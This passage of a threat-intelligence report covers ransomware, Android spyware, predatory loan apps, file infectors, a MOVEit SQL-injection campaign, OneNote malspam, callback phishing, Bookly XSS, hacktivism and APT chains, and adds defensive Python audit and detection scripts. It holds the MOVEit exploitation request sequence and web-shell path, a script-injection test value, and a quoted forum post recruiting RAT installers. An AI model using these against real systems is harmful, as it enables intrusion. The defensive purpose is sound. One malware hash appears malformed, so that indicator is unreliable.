09. Terminated processes include SecurityHealthSystray.exe, and the mutex created during execution was 13fd9a89b0eede26272934728b390e06.
Ransom note text (LockBit Black): "All your important files are stolen and encrypted! You must find zbzdbs59d.README.txt file and follow the instruction!"
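As an added defender-side example (not code from the report), the following Python script audits the event-log channel state that LockBit Black tampers with: it reads the Enabled value of every subkey under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels on a Windows host and otherwise runs against a constructed snapshot. The high-value channel list and the snapshot are assumptions for illustration.

```python
"""Audit Windows event-log channels for the log-disabling technique described
above: LockBit Black sets the Enabled value of channel subkeys under
HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels to 0.
Added example; the channel list and snapshot below are constructed."""
import sys

CHANNELS_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels"

# Assumed set of channels whose loss hides exactly the activity the report
# describes (PsExec execution, AV tampering, RDP changes, encryption).
HIGH_VALUE_CHANNELS = {
    "Security",
    "System",
    "Microsoft-Windows-Windows Defender/Operational",
    "Microsoft-Windows-PowerShell/Operational",
    "Microsoft-Windows-Sysmon/Operational",
    "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational",
}


def audit_channels(channels):
    """channels maps channel name -> Enabled value (None when the value is
    absent, which Windows treats as enabled). Returns two sorted lists:
    disabled high-value channels and other disabled channels."""
    high, other = [], []
    for name, enabled in channels.items():
        if enabled == 0:
            (high if name in HIGH_VALUE_CHANNELS else other).append(name)
    return sorted(high), sorted(other)


def bulk_disable_score(channels, threshold=10):
    """Many channels flipped to 0 at once is the fingerprint of anti-forensic
    tooling, not of an admin silencing one noisy log. Returns (count, alert)."""
    disabled = sum(1 for value in channels.values() if value == 0)
    return disabled, disabled >= threshold


def read_channels_from_registry():
    """Live reader for a Windows host; walks every channel subkey."""
    import winreg  # Windows-only module, imported lazily on purpose
    channels = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, CHANNELS_KEY) as root:
        index = 0
        while True:
            try:
                name = winreg.EnumKey(root, index)
            except OSError:  # no more subkeys
                break
            index += 1
            with winreg.OpenKey(root, name) as sub:
                try:
                    channels[name] = winreg.QueryValueEx(sub, "Enabled")[0]
                except FileNotFoundError:
                    channels[name] = None
    return channels


# Constructed snapshot of the key after tampering (not from a real host).
SAMPLE_SNAPSHOT = {
    "Application": 0,
    "Security": 0,
    "System": 0,
    "Microsoft-Windows-Windows Defender/Operational": 0,
    "Microsoft-Windows-PowerShell/Operational": 0,
    "Microsoft-Windows-Sysmon/Operational": 1,
    "Microsoft-Windows-TaskScheduler/Operational": None,
    "Microsoft-Windows-WMI-Activity/Operational": 0,
}


def main():
    if sys.platform == "win32":
        channels = read_channels_from_registry()
    else:
        channels = SAMPLE_SNAPSHOT
    high, other = audit_channels(channels)
    count, alert = bulk_disable_score(channels)
    for name in high:
        print(f"[!] high-value channel disabled: {name}")
    for name in other:
        print(f"[-] channel disabled: {name}")
    print(f"{count} channel(s) disabled; bulk-disable alert: {alert}")


if __name__ == "__main__":
    main()
```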
Fake applications disguised
as legitimate ones
Criticality: High
Targets: Android Users
Countries Affected: India
In a recent alert, the Indian Railway Catering and Tourism Corporation (IRCTC) cautioned users about a malicious Android app, irctcconnect.apk, that circulated on messaging platforms like WhatsApp and Telegram. The fraudulent app, masquerading as the official IRCTC app, posed a serious risk to users by functioning as spyware.
The deceptive app was capable of stealing Facebook and Google credentials, extracting codes from Google Authenticator, tracking GPS and network locations, recording videos using the Camera API, and collecting information about the applications installed on users' devices.
IRCTC's advisory emphasized the app's malicious nature and warned users against downloading it. The phishing links, distributed widely, impersonated IRCTC officials to trick users into revealing sensitive net banking credentials, including UPI details and credit/debit card information.
Antivirus programs can identify and detect such malicious applications, specifically those sharing similarities with the "Android.SpyNote.GEN" family.
Figure: Fake IRCTC app, on screen and behind the screen. On screen, the fake app is disguised as the legitimate IRCTC app and seeks permissions on the infected device; behind the screen it steals social media credentials, collects location information and collects installed-application info (detected as Android.SpyNote.GEN).
Indicators of Compromise (IoCs):
1. 45c154af52c65087161b8d87e212435a
2. c01566f5feb7244ed4805e2855ebdc400
3. c77435e6e77152d24e86eb75e1f04d75
Battling the death trap of
malicious loan apps
In the age of instant finance at our fingertips, loan apps have reshaped how we access funds. However, beneath the convenience lies a concerning trend: malicious apps that are being linked to tragic outcomes. A spate of tragic deaths has occurred pan-India in the last 2-3 years. The reason: seemingly genuine loan applications with sinister motives behind them. The victims are individuals who took loans from such apps and ended up committing suicide, driven by harassment, blackmail, and abuse by the operators of these loan apps.
These applications offer small loans without requiring much paperwork but, in turn, charge heavy interest rates and often resort to extortion through morphed photographs and cyberbullying. Many of these apps compel users to share unnecessary information, including contact details, photographs, location, and more. Subsequently, the operators behind these apps use these details to harass the victim with defamatory messages and manipulated photographs sent to their contacts. This unwarranted harassment leads some users into depression and to attempting suicide out of fear of public humiliation.
These applications request permissions, a few of which are unnecessary for a lending product, such as android.permission.BLUETOOTH and android.permission.READ_CALL_LOG.
Google has been proactive in removing 3,500 such applications from its Play Store and has mandated that developers take measures such as setting the application category to 'Finance', stating the minimum and maximum repayment period, and stating the maximum annual percentage rate, which may include interest and other fees. In addition, Google has restricted loan apps that require repayment in full within 60 days. Personal loan applications are no longer allowed to access sensitive data such as photos and contacts.
The Reserve Bank of India (RBI) has also published guidelines stating that Regulated Entities (REs) should ensure that their Digital Lending Applications (DLAs) do not access mobile phone resources such as media, contact lists, call logs or telephony functions.
Criticality: Medium
Targets: Android Users
Countries Affected: India
Reported loan applications (indicators of compromise, IoC):
Application Name                   Package Name
Future Rupee – Credit Loan         com.future.cash.rupee
InstaNova – Easy Instant Loans     com.wavfge.magfin
Mobile Money                       com.mobile.money.cash
Salina Loan                        com.salina.loan.mountain
CA loan                            com.assistance.career.loansindia
Fast Loan- Speed Cash Loan         com.fastloan.cashloan.instantloan.loanapp
Toop Loan                          in.azme.high.top.loan
Credit Wallet: Easy Loans          com.ceditwallet.now
Asher Loan                         com.asher.loan.cocla
Permissions declared by the apps: READ_PHONE_STATE, CAMERA, READ_SMS, CHANGE_WIFI_STATE, ACCESS_WIFI_STATE, INTERNET, ACCESS_COARSE_LOCATION, BLUETOOTH, READ_CALL_LOG.
Process followed by these applications to retrieve sensitive information (code screenshots in the original, not reproduced): run-time contact access, accessing external storage, location access code.
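As an added example (not tooling from the report), this Python script audits the permissions a lending app's AndroidManifest.xml declares against the limits described above: Google's rule that personal-loan apps may not access photos or contacts, and RBI's rule that DLAs must not access media, contact lists, call logs or telephony. The mapping of those rules onto concrete permission names, the review list, and the sample manifest (built from the permission set the report lists, with a placeholder package name) are assumptions for illustration.

```python
"""Permission audit for digital lending apps. Added example; the policy sets
are an assumed mapping of the Google and RBI rules quoted above onto Android
permission names, and the manifest is constructed for illustration."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Assumed mapping: what a loan app must never touch (Google / RBI wording).
LENDING_PROHIBITED = {
    "android.permission.READ_CONTACTS": "contact list",
    "android.permission.READ_CALL_LOG": "call logs",
    "android.permission.CALL_PHONE": "telephony",
    "android.permission.READ_PHONE_STATE": "telephony",
    "android.permission.READ_EXTERNAL_STORAGE": "media / photos",
    "android.permission.READ_MEDIA_IMAGES": "media / photos",
    "android.permission.READ_MEDIA_VIDEO": "media / photos",
}
# Called out by the report as having no use in a lending product.
LENDING_UNNECESSARY = {"android.permission.BLUETOOTH"}
# Sensitive but sometimes justified; flagged for manual review (assumed list).
LENDING_REVIEW = {
    "android.permission.CAMERA": "justify for KYC capture only",
    "android.permission.READ_SMS": "OTP auto-read; prefer SMS Retriever API",
    "android.permission.ACCESS_COARSE_LOCATION": "collect once, with consent",
}


def declared_permissions(manifest_xml):
    """Return uses-permission names in declaration order."""
    root = ET.fromstring(manifest_xml)
    attr = f"{{{ANDROID_NS}}}name"
    return [el.get(attr) for el in root.iter("uses-permission") if el.get(attr)]


def audit_manifest(manifest_xml):
    """Return (verdict, findings); each finding is (permission, level, note)."""
    findings = []
    for perm in declared_permissions(manifest_xml):
        if perm in LENDING_PROHIBITED:
            findings.append((perm, "prohibited", LENDING_PROHIBITED[perm]))
        elif perm in LENDING_UNNECESSARY:
            findings.append((perm, "unnecessary", "no lending use case"))
        elif perm in LENDING_REVIEW:
            findings.append((perm, "review", LENDING_REVIEW[perm]))
    if any(level == "prohibited" for _, level, _ in findings):
        verdict = "reject"
    elif findings:
        verdict = "review"
    else:
        verdict = "pass"
    return verdict, findings


# Constructed manifest reproducing the permission set the report lists for the
# flagged apps; the package name is a placeholder, not one of the reported apps.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.placeholder.loan">
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.BLUETOOTH"/>
    <uses-permission android:name="android.permission.READ_CALL_LOG"/>
    <application android:label="placeholder"/>
</manifest>"""

if __name__ == "__main__":
    verdict, findings = audit_manifest(SAMPLE_MANIFEST)
    for perm, level, note in findings:
        print(f"{level:11} {perm}  ({note})")
    print("verdict:", verdict)
```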
Expiro: Old virus poses a
new challenge
Expiro is no stranger in the family of viruses, having existed since 2011. However, over the last one and a half years, a sudden surge in Expiro cases has been witnessed, primarily targeting regions in India. Two different versions of Expiro have been observed: one uses multi-layered, complex code to retrieve the patched code from the infected file, and the other modifies the imports of the clean file. Despite the differences, both versions share the common goal of infecting executable files on the system by appending virus code at the end. Upon execution, the infector code runs first, and the patched call is then redirected to a new address so that the benign code executes. Restoring the file to its original state is challenging because the overwritten code is compressed and encrypted, and is only decrypted at runtime by highly obfuscated decompression and decryption routines.
Criticality: High
Sectors Targeted: Power and Energy
Regions: South Asia
The infection routine executes in a manner that allows user applications to run seemingly normally, unbeknownst to the user. This Expiro variant can check network-mapped drives, infecting executable files on those drives and potentially spreading the infection across the network. Additionally, this variant has been observed exhibiting backdoor capabilities by connecting to remote servers. Expiro can receive commands from these servers and execute them on the infected system, including installing other malware capable of stealing and uploading sensitive information.
Risks posed by Expiro
Expiro can accept commands from its controller and execute them on infected systems. With commands successfully delivered to victims, Expiro can:
- Install other malware (keyloggers, spyware, ransomware, etc.)
- Steal and upload sensitive information
- Disable security software on the systems
- Hijack servers
- Establish itself to act at a later point in time
The Power and Energy sector had the maximum detections of Expiro attacks.
The infection vector:
- Cracked or patched versions of software
- Drive-by download: a file downloaded upon visiting an infected website
- Dropped by other malware, USB drives, malvertising campaigns, etc.
Expiro infects both 32-bit and 64-bit executable files. The new variant is a type of "appender" virus that infects files by inserting virus code at the end of the file, specifically in the last section of the executable.
File Infection Process
The new variant of Expiro patches a call in the executable section that further jumps to the last section, at an offset where the malicious virus code is present. The code that calculates and selects which call to patch is highly obfuscated.
Upon analysing multiple files of this variant, it was found that the decompressed buffer for most infected files remains the same while the wrapper keeps changing.
After successful decompression and decryption, the infected application is launched, and it starts infecting other executables present on the system.
Due to the obfuscated call-patching routine and the encrypted virus code, it is challenging to clean infected files with complete accuracy.
DarkRace Ransomware: A deep dive into its techniques and impact
Brief: DarkRace ransomware is a derivative of the infamous LockBit ransomware, borrowing heavily from its leaked source code.
How it spreads:
- Cracked software infiltration: the ransomware discreetly enters systems through cracked software installations, using obfuscator technology.
- Phishing email attacks: DarkRace employs social engineering in phishing emails, deceiving users into activating exploit kits and initiating ransomware attacks.
The section below delves into the key characteristics and tactics employed by DarkRace, shedding light on its intricate functionalities.
Criticality: High
Sectors Targeted: Manufacturing,
Financial, Transportation, Science
& Technology
Regions: Europe and United States
Mutex Checks: Efficient Resource Utilization and Stealth Operation
DarkRace implements Mutex checks on infected systems, a strategic
measure to prevent multiple infections on the same system. This not
only ensures efficient use of resources but also mitigates the risk of
detection arising from excessive activity. By employing Mutex checks,
DarkRace operates stealthily, enhancing its overall effectiveness in
compromising targeted systems.
Runtime Decryption: Unveiling Crucial Information Dynamically
The ransomware incorporates runtime decryption mechanisms for XML
data, encompassing critical information such as the ransom note,
whitelisted files, folders, and extensions. This dynamic decryption approach
allows DarkRace to adapt its tactics during runtime, maintaining flexibility
and further complicating efforts to counter its malicious activities.
Encryption using Salsa20: Speed and Security in File Compromise
DarkRace leverages the Salsa20 stream cipher, renowned for its speed
and security, as the encryption algorithm of choice. This robust
encryption method is employed to encrypt files on the victim's system,
appending a random extension to them. This deliberate action renders
the files inaccessible until a ransom is paid to acquire the decryption key,
adding a layer of complexity to recovery efforts.
Post Encryption Measures: Heightened Security
Evasion and Covering Tracks
Post-encryption, DarkRace adopts additional measures to make recovery
more challenging. This includes the deletion of shadow copies, hindering
traditional recovery methods. Going a step further, DarkRace terminates
processes that might interfere with its operation or could potentially be
used to recover encrypted data. After executing its malicious activities,
the ransomware takes the drastic step of deleting its own files and
restarting the system. This deliberate act adds an extra layer of
complexity, making it exceptionally challenging for cybersecurity experts
to trace its activities and develop effective countermeasures.
Summary of techniques (as depicted in the original figure):
Mutex checks: prevents multiple infections on the same system for efficient resource utilization; avoids detection by limiting excessive activity.
Runtime decryption: decrypts XML data, revealing information such as ransom notes and whitelisted files; enhances flexibility and adaptability in handling encrypted content.
Encryption with Salsa20: uses the Salsa20 stream cipher for swift and secure file encryption; appends a random extension to files, rendering them inaccessible until ransom payment.
Post-encryption measures: deletes shadow copies to hinder recovery efforts; terminates interfering processes, covers its tracks, and restarts the system for added evasion.
Code screenshots in the original (not reproduced): checking the existing mutex object; decrypted XML format string; getting the drives; deleting the event logs; deleting the shadow copy; retrieving services from the XML data; ransom note.
Critical Zero-Day Vulnerability in MOVEit Transfer
MOVEit Transfer is widely recognized as a secure and popular managed file transfer program used by enterprises to transfer data safely using protocols such as SFTP, SCP, and HTTP-based uploads. This specific vulnerability, referred to as CVE-2023-34362, heightens the risk of unauthorized access and exploitation of elevated privileges within the system.
Criticality: High
Sectors Targeted: Government,
Finance, Media, Aviation,
Healthcare
Countries Affected: United States
The attack starts from a SQL injection vulnerability that could grant unauthorized individuals access to the MOVEit Transfer database if exploited.
The vulnerability is actively targeted, with attackers leveraging HTTP or HTTPS channels to exploit it. After successfully exploiting the vulnerability, the attacker deploys a web shell (human.aspx), a hidden entry point for future access.
Through this deployed web shell, the threat actor gains continued backdoor access to the compromised system, establishing a means for continuous control. Subsequently, they initiate data exfiltration activities, secretly extracting sensitive information without authorization.
Certain patterns of requests are frequently observed when attempting to implant malicious web shells.
Observed patterns of requests (annotated in the original figure as File Upload, File Upload, SQL Injection, Access Webshell):
GET / - port 443
POST /guestaccess.aspx - port 443
POST /api/v1/token - port 443
GET /api/v1/folders - port 443
POST /api/v1/folders/[PATH]/files?uploadType=resumable - port 443
POST /machine2.aspx - port 80
POST /moveitisapi/moveitisapi.dll - port 443
POST /guestaccess.aspx - port 443
PUT /api/v1/folders/[PATH]/files?uploadType=resumable&fileId=[FILEID] - port 443
POST /machine2.aspx - port 80
GET /human2.aspx - port 443
These patterns often serve as indicators of compromise. The software provider quickly developed a patch to fix the identified vulnerability, ensuring users could update their MOVEit Transfer installations and protect their systems from potential exploitation.
Steps for prevention
Update MOVEit Transfer: upgrade to the patched versions MOVEit Transfer 2023.0.1, 2022.1.5, 2022.0.4, 2021.1.4, 2021.0.6.
Disable HTTP and HTTPS traffic: modify firewall rules to block incoming traffic on ports 80 and 443, preventing potential attacks on MOVEit Transfer.
Remove unauthorized files and users: delete "human2.aspx" and scrutinize and eliminate
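As an added detection example (not from the report), the following Python script scans access-log lines for the request pattern listed above: the staging requests to moveitisapi.dll, guestaccess.aspx and machine2.aspx from one client, the resumable upload to /api/v1/folders/.../files that follows, and any request to human2.aspx. The log field layout and the sample lines are constructed for illustration.

```python
"""Detect the CVE-2023-34362 exploitation pattern in web-server access logs.
Added example; the log layout (date time c-ip cs-method cs-uri-stem
cs-uri-query s-port sc-status, as in an IIS W3C log with those fields
selected) and the sample lines are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<port>\d+) (?P<status>\d+)$"
)
# Endpoints taken from the report's observed request pattern.
WEBSHELL_STEM = "/human2.aspx"
STAGING_STEMS = {"/moveitisapi/moveitisapi.dll", "/guestaccess.aspx", "/machine2.aspx"}
UPLOAD_RE = re.compile(r"^/api/v1/folders/[^/]+/files$")


def parse_line(line):
    """Parse one log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
    rec["stem"] = rec["stem"].lower()
    rec["query"] = rec["query"].lower()
    return rec


def detect(lines, window_minutes=10):
    """Return {client_ip: [(severity, reason), ...]} for suspicious clients.
    Any hit on the web shell is high. All three staging endpoints seen from
    one client within the window is medium, and a resumable upload after that
    staging sequence is medium too (the file-drop step of the pattern)."""
    window = timedelta(minutes=window_minutes)
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    findings = defaultdict(list)
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        staged = False
        for i, rec in enumerate(recs):
            if rec["stem"] == WEBSHELL_STEM:
                findings[ip].append(("high", f"request to web shell {WEBSHELL_STEM} (status {rec['status']})"))
            if not staged and rec["stem"] in STAGING_STEMS:
                # Staging stems this client hit inside the window ending now.
                recent = {r["stem"] for r in recs[: i + 1]
                          if r["stem"] in STAGING_STEMS and rec["ts"] - r["ts"] <= window}
                if recent == STAGING_STEMS:
                    staged = True
                    findings[ip].append(("medium", "SQL injection staging sequence "
                                         "(moveitisapi.dll, guestaccess.aspx, machine2.aspx)"))
            elif staged and rec["method"] in ("PUT", "POST") \
                    and UPLOAD_RE.match(rec["stem"]) and "uploadtype=resumable" in rec["query"]:
                findings[ip].append(("medium", "resumable file upload after staging sequence"))
    return dict(findings)


# Constructed sample: one client walking the full pattern, one benign client.
SAMPLE_LOG = """\
2023-06-01 03:12:01 203.0.113.7 GET / - 443 200
2023-06-01 03:12:03 203.0.113.7 POST /moveitisapi/moveitisapi.dll - 443 200
2023-06-01 03:12:04 203.0.113.7 POST /guestaccess.aspx - 443 200
2023-06-01 03:12:05 203.0.113.7 POST /machine2.aspx - 80 200
2023-06-01 03:12:09 203.0.113.7 PUT /api/v1/folders/123456/files uploadType=resumable&fileId=987654 443 200
2023-06-01 03:12:15 203.0.113.7 GET /human2.aspx - 443 404
2023-06-01 08:00:00 198.51.100.9 POST /guestaccess.aspx - 443 200
2023-06-01 08:00:05 198.51.100.9 GET /api/v1/folders - 443 200
"""

if __name__ == "__main__":
    for ip, hits in detect(SAMPLE_LOG.splitlines()).items():
        for severity, reason in hits:
            print(f"{ip} [{severity}] {reason}")
```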
OneNote Exploits:
The latest weapon in cybercrime
OneNote, with a significant installation base worldwide and extensive use for note maintenance, is facing a new malware distribution method that raises concerns among users. Malicious actors are disguising malware as OneNote files and distributing them through email and other messaging platforms. These malicious spam (malspam) emails masquerade as various documents, including DHL shipping notifications, invoices, ACH remittance forms, mechanical drawings, and shipping documents.
The attackers embed malicious Visual Basic Script (VBS) attachments into OneNote notebooks. When an unsuspecting user double-clicks on these attachments, the malware is launched. Notably, various Remote Access Trojans (RATs) like AsyncRAT, Quasar RAT, and NetWire have been observed using OneNote files for their distribution. Many of these OneNote files contain batch scripts that download the payload using PowerShell. Additionally, malware families such as QBot, IcedID, and Emotet have explored this file type.
Criticality: High
Sectors Targeted: Windows Users
Regions: India, China, European Union,
United States, & Africa
In the case of the QBot campaign, the OneNote file contains obfuscated
".hta" files that download DLLs. Conversely, in the Emotet campaign, the
infection chain is different. The OneNote file contains obfuscated VBScript
with a ".wsf" file extension, cleverly hidden from end users. This file, in turn,
downloads the Emotet DLL from a compromised website.
This sophisticated attack methodology poses a high level of criticality,
especially given the widespread use of OneNote globally. Users are urged
to exercise caution, particularly when receiving unexpected documents or
files through email or messaging platforms to mitigate the risk of falling
victim to this threat.
The Surge of BazaCall and
Caller-Driven Malware Attacks
BazaCall has emerged as a potent technique since 2021, employing phone calls to entice targets into clicking malicious links and unknowingly installing malware.
Modus operandi: Phishing emails with provided phone numbers lure victims into making calls, where operators convince them to grant remote access. Simultaneously, network operators exploit this access to clandestinely install backdoors.
Affiliated ransomware groups leverage this method, recruiting callers proficient in multiple languages for vishing campaigns using "callback phishing".
Evolving BazaCall tactics have seen the deployment of notorious malware strains like BazarLoader, TrickBot, and IcedID, with a focus on the US, Canada, and select Asian countries.
Underground forums witness a growing demand for individuals skilled in caller-based techniques. Some operators, working on bulk orders, strategically use toll-free numbers to avoid SIM blocking, underscoring the adaptability of this malicious approach.
Corporate implications: Corporate entities must be alert to the rising threat of caller-based services, recognizing them as a new vector for malware infiltration.
Figure: Threat actor seeking caller services (underground forum post, as shown in the original):
"I am looking for Callers for Ratting Mobile Carrier Store PC's Namely USA and UK Countries. Candidate must be Fluent in English and have Prior Experience in this Profession as well as must be Good in Social Engineering. You will be Provided Direct Link to the RAT Stub .exe File which You should be able to Convince the Store Employees to Download the File and Execute it. Monetary Compensation can be Discussed and Agreed upon. Interested Candidates can Contact me on my Telegram.
Also I am open to work with People who are into sim-swapping, Ratting Mobile Store PC's, etc. I have FUD RAT Stubs and looking for People who can RAT Mobile Carrier Store PC's. Profit will be Shared among us 50/50."
Figure: Affiliates of threat actors reaching out to targets (email lure, as shown in the original):
"Hello, We received an inquiry concerning an invoice correct? I was unable to locate your account with the information you sent out. Could you send over the phone number or email address attached to the account so that we can look into it for you?"
Spam mail randomization (subject-line variants shown in the original): {Health Policy: soft copy; {Insurance Database is Updated or invoice
Phishing Hit Count for Year 2023 (number of attacks per month, Oct 2022 to Oct 2023; values as extracted from the chart, in month order):
Oct 2022   60029
Nov 2022   35375
Dec 2022   20135
Jan 2023   19139
Feb 2023   34337
Mar 2023   25881
Apr 2023   34169
May 2023   17416
Jun 2023   27852
Jul 2023   28992
Aug 2023   17742
Sep 2023   16744
Oct 2023   16395
WordPress Bookly Plugin Vulnerability: CVE-2023-1172 and CVE-2023-1159
The "WordPress Online Booking and Scheduling Plugin – Bookly" is a widely used WordPress plugin installed on over 60,000 websites. Bookly streamlines online bookings and automates the reservation process. However, like many other WordPress plugins, it is vulnerable to exploitation by attackers. It allows unauthenticated attackers to inject malicious scripts, potentially compromising a site owner's entire site when they access the calendar tooltip from the plugin.
In March 2023, SEQRITE Labs uncovered two security vulnerabilities in the
Bookly plugin for WordPress impacting users worldwide.
The first vulnerability, CVE-2023-1172, is a high severity Cross-Site Scripting
flaw resulting from inadequate input sanitization and output escaping in
the full name value. Unauthorized attackers can globally exploit this,
injecting arbitrary web scripts onto pages, posing a significant risk with
every user visit.
The second vulnerability, CVE-2023-1159, classified as medium severity, is a
Cross-Site Scripting issue stemming from insufficient input sanitization and
output escaping in the 'Service Title' field. Authenticated attackers with
administrative privileges can leverage this vulnerability in multisite
installations or where the "unfiltered_html" feature is disabled. They can
insert web scripts into pages, which execute when users access the
affected pages.
Both vulnerabilities have a global reach, with CVE-2023-1172 being of
higher severity, emphasizing the critical need for users to address these
security concerns promptly.
Research discovered that the Bookly plugin’s “Full name” field was
vulnerable to stored cross-site scripting (XSS) attacks. The plugin reuses
the user’s “Full name” input in multiple files, significantly increasing the risk
of security breaches if the input is not properly sanitized and escaped to
prevent malicious code injection.
The vulnerability has been fully resolved in plugin version 21.5.1. It is strongly recommended that WordPress site owners update their site to the latest
patched version of the plugin (currently version 21.6 at the time of writing) to prevent potential attacks.
Criticality: High
Sectors Targeted: All
Countries Affected: Worldwide
RESOLVING THE ISSUE: A LOOK AT THE PATCH
Before the patch (vulnerable: the substituted code value is used as-is):
    public static function stringify( $tokens, $codes, $bold, $exclude = array() )
    ...
        $data = self::get( $token[1], $codes );
    ...
    return self::stringify( self::tokenize( $text ), $codes, $bold, $exclude );
After the patch (a new $escape parameter strips tags from the substituted value):
     * @param bool $escape
    public static function stringify( $tokens, $codes, $bold, $exclude = array(), $escape = false )
    ...
        $code = self::get( $token[1], $codes );
        $data = $escape ? strip_tags( $code ) : $code;
    ...
    return self::stringify( self::tokenize( $text ), $codes, $bold, $exclude, $escape );
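To show what the patch changes, here is an added Python re-implementation of the same tokenize/stringify pattern (not Bookly's PHP): template codes such as {client_name} are replaced by user-supplied values, and an escape flag decides whether the value is neutralised before it reaches the page. It uses html.escape where the PHP patch uses strip_tags, and the template and client values are constructed.

```python
"""Template-code substitution with an output-escaping switch, mirroring the
Bookly patch above. Added example; html.escape is used where the PHP patch
uses strip_tags, and the template and client values are constructed."""
import html
import re

TOKEN_RE = re.compile(r"\{([a-z_]+)\}")


def tokenize(text):
    """Split template text into literal strings and ("code", name) tuples."""
    tokens, pos = [], 0
    for m in TOKEN_RE.finditer(text):
        if m.start() > pos:
            tokens.append(text[pos:m.start()])
        tokens.append(("code", m.group(1)))
        pos = m.end()
    if pos < len(text):
        tokens.append(text[pos:])
    return tokens


def stringify(tokens, codes, bold=(), exclude=(), escape=False):
    """Substitute code values. With escape=False (the pre-patch behaviour)
    a value like a booking's "Full name" is inserted verbatim, so markup in
    it becomes part of the page; with escape=True it is rendered inert."""
    out = []
    for token in tokens:
        if isinstance(token, str):
            out.append(token)
            continue
        name = token[1]
        if name in exclude:  # leave the placeholder for a later pass
            out.append("{%s}" % name)
            continue
        value = str(codes.get(name, ""))
        data = html.escape(value, quote=True) if escape else value
        if name in bold:
            data = "<b>%s</b>" % data
        out.append(data)
    return "".join(out)


def render(text, codes, bold=(), exclude=(), escape=False):
    """Convenience wrapper matching the call site shown in the patch."""
    return stringify(tokenize(text), codes, bold, exclude, escape)


# Constructed tooltip template and a "Full name" value carrying markup.
TOOLTIP = "Booking for {client_name} at {appointment_time}"
CLIENT = {"client_name": "Jane <script>/* injected */</script>",
          "appointment_time": "10:00"}

if __name__ == "__main__":
    print("unescaped:", render(TOOLTIP, CLIENT))
    print("escaped:  ", render(TOOLTIP, CLIENT, bold=("client_name",), escape=True))
```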
Multiple Hacktivist groups
target India during the G20
Summit
Hacktivist groups from neighbouring countries had announced plans to attack websites of private and public entities in India during the G20 Summit. More
than 30 hacktivist groups targeted around 600+ government and private entities through DDoS attacks, defacements, and data leaks.
The most targeted sectors were government, followed by finance, technology, public, and education industries. Similar coordinated attacks are anticipated
next year during India’s General Elections, Paris Olympics, etc.
Daily Attacks Timeline (number of attacks per day; dates indicating the rise in the number of attacks during the G20 Summit):
08/09/2023   54
09/09/2023   152
10/09/2023   213
Attacks by Top 10 Hacktivists (x-axis: hacktivist organisation name; y-axis: number of attacks). Bar values as extracted, in ascending order: 4, 4, 6, 7, 15, 16, 22, 43, 75, 176. The organisation labels were extracted as a column of single characters; split at capital letters they read: Black Shinchan X X X Cyber Error System Jateng Cyber Team Jaring S G Cyber Regiment Root Team Hacktivist Indonesia Ganosec Team Team Insanepk Hizbullah Cyber Team.
Decoding the Dynamics of Advanced Persistent Threats
Advanced Persistent Threat (APT) groups stand out due to their sophisticated techniques and specific targets. This section outlines key details about prevalent APTs, expanding on their tactics and targets.
SideCopy: Initiating Complex Chains of Infection
Description: SideCopy distinguishes itself by distributing its own malware. The group employs a nuanced approach, often initiating attacks through malicious LNK files. These files set off a sophisticated chain of infection, leveraging multiple HTAs and loader DLLs, ultimately culminating in the deployment of final payloads.
Target: SideCopy primarily targets the Telecom, Power, and Finance sectors, showing a strategic focus on critical infrastructure and financial entities.
Transparent Tribe: Evolving Scope and Strategic Campaigns
Description: Transparent Tribe is an APT group traditionally concentrated on the Indian defence ecosystem. However, it is now also targeting educational institutions and students in the Indian subcontinent. The group's malware arsenal includes Crimson RAT, a consistent tool in its campaigns.
Target: Transparent Tribe has its sights on national information assets, showing a multifaceted approach that encompasses government and critical infrastructure entities.
RedFoxtrot: A Prolific Actor in Asian Cyber Espionage
Description: RedFoxtrot, active since at least 2014, specializes in targeting government and telecom sectors across Asian countries.
Target: RedFoxtrot predominantly focuses on defence institutes and the telecom sector, aligning its activities with geopolitical developments.
[Diagram: Depicting SideCopy - Infection chain-1 with the same IP. Phishing waves in April, May, August and October; a shortcut stager using the lure theme "Homosexuality - Indian Armed Forces" launches an HTA that runs preBotHta in-memory and stages Ares RAT, while a decoy is downloaded as PDF; the same file name carries different payloads across waves. C2 port labelled 7015; domain and IP labels omitted here.]
[Diagram: Depicting SideCopy - Infection chain-2 with IP sharing with domains and C2. Phishing waves in August and October deliver archives named DocScanner_Aug_2023 and DocScanner_Oct (similar naming), the latter labelled with CVE-2023-38831; a shortcut stager launches an HTA that runs a DLL in-memory and delivers DRat, AllaKore RAT or Ares RAT, with decoys downloaded as PDF. C2 ports labelled 9012, 9828 and 61101; domain and IP labels omitted here.]
